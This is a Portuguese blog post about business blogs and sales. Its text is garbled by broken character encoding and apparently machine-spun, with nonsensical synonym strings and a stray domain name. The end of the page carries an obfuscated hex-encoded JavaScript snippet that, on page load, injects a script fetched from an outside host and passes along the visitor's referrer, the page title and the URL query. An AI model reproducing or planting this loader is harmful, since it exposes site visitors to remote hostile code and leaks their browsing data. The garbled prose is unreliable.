Blog

Blogues E Vendas: Uma Parceria De Empreendimento Natural ?

Como o visitante pode inventar, uma de principais razA�es pelas quais as empresas consideram estes blogs eficientes como ferramentas de negA?cios A� que elas auxiliam a ocasionar ou promover as vendas. Embora nA?o haja um valor quantitativo com relaA�A?o A� influA?ncia monetA?ria exata dos blogs sobre as vendas, hA? evidA?ncias por algum gA�nero de retorno sobre este investimento. Este aumento nas vendas pode ser e geralmente foi um destes efeitos indiretos dos blogs de sucesso.

Blogs – bom para os negA?cios

Imagine sentar em frente ao seu computador com milhA�es por pessoas (acionistas, parceiros do negA?cios, concorrentes, funcionA?rios e a mA�dia) conversando sobre negA?cios e afins. Doravante imagine se vocA? pode usar todas as informaA�A�es que o visitante aprendeu para estabelecer o produto ou serviA�o que seus clientes querem, por que eles querem, tais como eles querem e quanto eles estA?o dispostos a pagar portanto. Isto A� precisamente o que A� um blogue e bastante mais. Definitivamente, os blogs sA?o bons para as empresas.

Um blog ou um blog foi um site interativo que mantA�m uma crA?nica contA�nua de informaA�A�es. A� 1 site atualizado regularmente com links para outros artigos ou outros sites. Geralmente, um blogue tende a ter uma A?rea do conteA?do primA?rio com artigos chamados postagens ou entradas listadas em ordem cronolA?gica inversa com as muito mais recentes no topo. Usualmente, esses artigos sA?o organizados em categorias. HA? igualmente um arquivo de artigos baseado em datas. Um blogroll, uma lista por links para outros sites relacionados foi outra caracterA�stica de 1 blog.

Um blogue pode conter um ou mais feeds. A maioria destes blogs publica feeds (RSS, RDF, Atom). Um feed A� 1 conteA?do legA�vel por mA?quina que foi atualizado periodicamente. Um rosalbalopezphotography.com leitor de feeds exibe a nova postagem e 1 link para ela. A maioria dos blogs tambA�m possui um refugio que permite aos visitantes deixar comentA?rios. Com um blog, o visitante publica novos conteA?dos e seus leitores podem adicionar seus prA?prios comentA?rios com links para seus prA?prios blogs. FA?cil de usar ferramentas por blogs estA?o disponA�veis, imensas vezes de graA�a. Uma ferramenta bA?sica de blogging fornece uma interface onde o visitante pode funcionar de forma fA?cil e intuitiva como cuida do restante da logA�stica envolvida em tornar seu blogue apresentA?vel e disponA�vel para o pA?blico.

Blogar, criar ou manter um blog A� uma de A?reas de rA?pido aumento da Net. De acordo com este popular motor de parecer Technorati, andam mais do 40 milhA�es de blogs na Net hoje em dia e mais blogues estA?o aparecendo na taxa de 75. 000 diA?riamente. Isto foi principalmente por motivos de aos inA?meros benefA�cios de blogs para negA?cios.

Um blogue tem uma poderosa propriedade de marketing para expandir seus negA?cios, seja ele pequeno ou grande. Actualmente vocA? pode vir a ter uma presenA�a dominante na Web, nA?o baseada em tamanho, capital ou recursos, porA�m baseada na qualidade por conteA?do, pA?blico-alvo e suplementos e serviA�os A?teis. Usando blogs saiba como equalizadores, a blogosfera se tornou 1 campo de jogo verdadeiramente estimulante para todas as empresas.

Um blogue A� uma fonte constante de informaA�A�es valiosas e atualizadas. A criaA�A?o de um blog permite que vocA? demonstre sua experiA?ncia e se estabeleA�a saiba como um lA�der de ideias em seu setor. Um blog pode ser seu veA�culo para atualizaA�A�es de suplementos ou serviA�os, notA�cias da empresa e qualquer outra informaA�A?o de que vocA? queira transmitir ao seu pA?blico-alvo. Um blog deve atalhar informaA�A�es relevantes, nA?o apenas arremessos de vendas; caso contrA?rio, A� muito menos provA?vel que os leitores retornem. Tais como acontece usando qualquer parcela de um plano do marketing da empresa, um blog deve conter informaA�A�es que atraiam seu pA?blico-alvo.

Um blog A� 1 mA�todo eficaz para se comunicar com clientes e prospects. Ele permite que vocA? converse abertamente e regularmente com eles, aumentando a credibilidade, criando confianA�a e formando relacionamentos com eles a partir de o princA�pio. Um blogue com seu estilo do conversaA�A?o A� ideal para desenvolver bons relacionamentos usando os clientes. Os leitores sentir-se-A?o desembaraA�ado consigo bastante antes de telefonarem-lhe para fazer uma adquire ou confinar o seu serviA�o.

Um blog A� uma A?tima ferramenta para obter feedback destes leitores. Seus leitores podem deixar comentA?rios ou criar perguntas. Um blog foi uma A?tima maneira por descobrir o que os leitores estA?o pensando e no processo fornece idA�ias ou tais como melhor atendA?-los, melhorando nesse caso o seu negA?cio. Formar decisA�es por negA?cios com base nos feedbacks destes leitores pode ser 1 dos movimentos mais hA?beis que vocA? pode fazer.

Ainda assim, para ser eficaz, 1 blog possui que ser atualizado usando freqA?A?ncia. Os leitores nA?o visitam blogs que nA?o apresentam novos conteA?dos regularmente. Manter estes leitores informados com postagens periA?dicas sobre o seu negA?cio cria buzz e publicidade. HA? trabalho envolvido na criaA�A?o de um blog. Leva tempo e compromisso para escrever posts interessantes e informativos. PorA�m pode ser bem gasto, especialmente se ajudar a gerar vendas.

Blogues e Vendas Em Tandem

As vendas exigem interaA�A?o pessoal. Um blogue A� um desses lugares onde a comunicaA�A?o atravA�s de conversas prospera e os relacionamentos sA?o fomentados. Quando vocA? dA? aos seus leitores informaA�A�es importantes que eles podem usar atravA�s do seu blog de maneira consistente, eles ficarA?o satisfeitos. Em seguida, eles retornarA?o para muito mais conteA?do recente regularmente. Horas extras, vocA? serA? capaz de construir um pA?blico fiel. Estes leitores vA?o vA?-lo saiba como um especialista em seu nicho especA�fico. Seus leitores vA?o confiar em vocA? e um relacionamento A� progredido. Seus leitores perceberA?o de que A� menos arriscado adquirir de o visitante ou aproveitar seu serviA�o. Se o visitante pode blogar eficientemente a cerca de o tema, eles tendem a acreditar que seu produto ou serviA�o valerA? a pena.

Ao blogar, vocA? estA? enviando a recado de que alguA�m estA? ouvindo, alguA�m que vocA? pode abordar tais como pode ser visto a partir de comentA?rios respondidos e novas atualizaA�A�es. Isso farA? com que seus leitores se sintam muito mais seguros e levarA? isso em consideraA�A?o, pois eles tomam uma decisA?o do compra. O blog A� especialmente inerentemente uma conversa contA�nua que, a longo prazo, gera confianA�a e lealdade e origina familiaridade. Quando eles se tornarem clientes satisfeitos, eles virA?o atA� mesmo vocA? para obter muito mais informaA�A�es e, se receberem a opA�A?o, desejarA?o adquirir de vocA?. Isso fortalece o relacionamento entre vocA? e seus clientes e eles tambA�m igualmente similarmente identicamente conjuntamente podem enviar outras vendas para vocA?. O ciclo continua. AlA�m disso, um blog foi uma forma extremamente eficiente para adquirir um ranking elevado do Search Engine. Em outras palavras, estes blogs podem trazer mais leitores e mais compradores em potencial.

Blogar A� marketing para as pessoas do uma maneira menos intrusiva e ofensiva, mais saiba como uma conversa freewheeling em comparaA�A?o com um discurso de vendas irritante. A� especialmente realmente uma boa maneira de promover as vendas, ainda de que indiretamente.

var _0xb322=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}